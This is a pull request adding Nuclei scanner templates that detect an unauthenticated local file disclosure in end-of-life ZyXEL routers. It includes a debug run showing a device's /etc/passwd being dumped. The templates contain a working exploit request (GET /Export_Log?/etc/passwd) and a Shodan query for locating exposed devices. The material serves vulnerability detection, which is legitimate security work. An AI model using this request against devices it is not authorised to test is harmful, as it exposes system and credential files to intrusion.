### PR TITLE
Create zyxel-exportlog-lfd.yaml

### DIFF
--- a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml
+++ b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml
@@ -4,6 +4,8 @@ info:
   name: Unauthenticated Local File Disclosure in zhttpd
   author: EvergreenCartoons
   severity: high
+  description: |
+    An endpoint in zhttpd can be used to expose system files including "/etc/passwd" and "/etc/shadow". This endpoint is accessible without prior login. An attacker can read all files on the system by using this endpoint.
   reference:
     - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/
     - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/

--- a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml
+++ b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml
@@ -1,7 +1,7 @@
 id: unauth-lfd-zhttpd
 
 info:
-  name: Unauthenticated Local File Disclosure in zhttpd
+  name: zhttpd - Unauthenticated Local File Disclosure
   author: EvergreenCartoons
   severity: high
   description: |
@@ -13,7 +13,7 @@ info:
   metadata:
     verified: "true"
     shodan-query: http.html:"VMG1312-B10D"
-  tags: misconfig,unauth,zyxel
+  tags: misconfig,unauth,zyxel,lfi
 
 requests:
   - raw:

--- a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml
+++ b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml
@@ -1,16 +1,17 @@
-id: zyxel-exportlog-lfd
+id: unauth-lfd-zhttpd
 
 info:
-  name: Multiple ZyXEL routers local file disclosure.
+  name: Unauthenticated Local File Disclosure in zhttpd
   author: EvergreenCartoons
-  severity: critical
-  description: |
-    Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue.
+  severity: high
   reference:
     - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/
     - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/
     - https://github.com/rapid7/metasploit-framework/pull/17388
-  tags: zyxel,lfd,msf
+  metadata:
+    verified: "true"
+    shodan-query: http.html:"VMG1312-B10D"
+  tags: misconfig,unauth,zyxel
 
 requests:
   - raw:
@@ -18,12 +19,18 @@ requests:
         GET /Export_Log?/etc/passwd HTTP/1.1
         Host: {{Hostname}}
         Accept: */*
+
     matchers-condition: and
     matchers:
       - type: regex
         part: body
         regex:
           - "root:.*:0:0:"
+
+      - type: word
+        part: header
+        words:
+          - 'application/octet-stream'
 
       - type: status
         status:

--- a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml
+++ b/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml
@@ -5,7 +5,7 @@ info:
   author: EvergreenCartoons
   severity: critical
   description: |
-    Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue. 
+    Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue.
   reference:
     - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/
     - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/

--- a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml
+++ b/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml
@@ -1,0 +1,30 @@
+id: zyxel-exportlog-lfd
+
+info:
+  name: Multiple ZyXEL routers local file disclosure.
+  author: EvergreenCartoons
+  severity: critical
+  description: |
+    Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue. 
+  reference:
+    - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/
+    - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/
+    - https://github.com/rapid7/metasploit-framework/pull/17388
+  tags: zyxel,lfd,msf
+
+requests:
+  - raw:
+      - |
+        GET /Export_Log?/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

Added a template for the ZyXEL multiple-EOL-devices local file disclosure bug disclosed by Sec Consult.



I tested this on a few versions and it works fine. 

Output including debug log stuff...

```
$ ../../tools/pd/nuclei -duc -t ./zyxel-export-lfd.yaml -u http://nope -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.7.7

		projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.7 (latest)
[INF] Using Nuclei Templates 9.1.9 (latest)
[INF] Templates added in last update: 35
[INF] Templates loaded for scan: 1
[DBG] Protocol request variables: 
	1. File => 
	2. RootURL => http://nope
	3. Scheme => http
	4. Hostname => nope
	5. BaseURL => http://nope
	6. Host => nope
	7. FQDN => nope
	8. SD => nope
	9. Port => 80
	10. RDN => nope
	11. TLD => nope
	12. Path => 
	13. DN => nope

[INF] [zyxel-eol-lfd] Dumped HTTP request for http://nope/Export_Log?/etc/passwd

GET /Export_Log?/etc/passwd HTTP/1.1
Host: nope
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

[DBG] Protocol response variables: 
	1. Port => 80
	2. request => GET /Export_Log?/etc/pass .... Accept-Encoding: gzip    
	3. host => http://nope
	4. template-id => zyxel-eol-lfd
	5. FQDN => nope
	6. RootURL => http://nope
	7. DN => nope
	8. curl-command => curl -X 'GET' -d '' -H 'A .... 8/Export_Log?/etc/passwd'
	9. all_headers => HTTP/1.1 200 OK  Content- .... e-Options: sameorigin    
	10. TLD => nope
	11. Path => 
	12. content_security_policy => frame-ancestors 'self'
	13. Scheme => http
	14. x_frame_options => sameorigin
	15. content_length => 182
	16. template-path => /home/user/projects/zyxel .... lfi/zyxel-export-lfd.yaml
	17. SD => nope
	18. BaseURL => http://nope
	19. Hostname => nope
	20. duration => 0.114969448
	21. header => HTTP/1.1 200 OK  Content- .... e-Options: sameorigin    
	22. date => Thu, 15 Dec 2022 13:39:40 GMT
	23. Host => nope
	24. interactsh-server => 
	25. response => HTTP/1.1 200 OK  Content- .... home/admin:/usr/bin/zysh 
	26. ip => nope
	27. RDN => nope
	28. body => nobody:x:99:99:nobody:/no .... home/admin:/usr/bin/zysh 
	29. template-info => {Multiple ZyXEL routers l ....  {critical} map[] <nil> }
	30. content_type => application/octet-stream
	31. status_code => 200
	32. File => 
	33. matched => http://nope/Export_Log?/etc/passwd
	34. type => http

[DBG] [zyxel-eol-lfd] Dumped HTTP response http://nope/Export_Log?/etc/passwd

HTTP/1.1 200 OK
Content-Length: 182
Content-Security-Policy: frame-ancestors 'self'
Content-Type: application/octet-stream
Date: Thu, 15 Dec 2022 13:39:40 GMT
X-Frame-Options: sameorigin


00000000  6e 6f 62 6f 64 79 3a 78  3a 39 39 3a 39 39 3a 6e  |nobody:x:99:99:n|
00000010  6f 62 6f 64 79 3a 2f 6e  6f 6e 65 78 69 73 74 65  |obody:/nonexiste|
00000020  6e 74 3a 2f 62 69 6e 2f  66 61 6c 73 65 0a 72 6f  |nt:/bin/false.ro|
00000030  6f 74 3a 78 3a 30 3a 30  3a 72 6f 6f 74 3a 2f 68  |ot:x:0:0:root:/h|
00000040  6f 6d 65 2f 72 6f 6f 74  3a 2f 62 69 6e 2f 73 68  |ome/root:/bin/sh|
00000050  0a 73 75 70 65 72 76 69  73 6f 72 3a 78 3a 31 32  |.supervisor:x:12|
00000060  3a 31 32 3a 73 75 70 65  72 76 69 73 6f 72 3a 2f  |:12:supervisor:/|
00000070  68 6f 6d 65 2f 73 75 70  65 72 76 69 73 6f 72 3a  |home/supervisor:|
00000080  2f 62 69 6e 2f 73 68 0a  61 64 6d 69 6e 3a 78 3a  |/bin/sh.admin:x:|
00000090  32 31 3a 32 31 3a 61 64  6d 69 6e 3a 2f 68 6f 6d  |21:21:admin:/hom|
000000a0  65 2f 61 64 6d 69 6e 3a  2f 75 73 72 2f 62 69 6e  |e/admin:/usr/bin|
000000b0  2f 7a 79 73 68 0a                                 |/zysh.|
[2022-12-15 13:33:33] [zyxel-eol-lfd:regex-1] [http] [critical] http://nope/Export_Log?/etc/passwd
[2022-12-15 13:33:33] [zyxel-eol-lfd:status-2] [http] [critical] http://nope/Export_Log?/etc/passwd
user@pop-os:~/projects/zyxel_lfi$ 


```

### Template Validation

I've validated this template locally?
- [ X] YES
- [ ] NO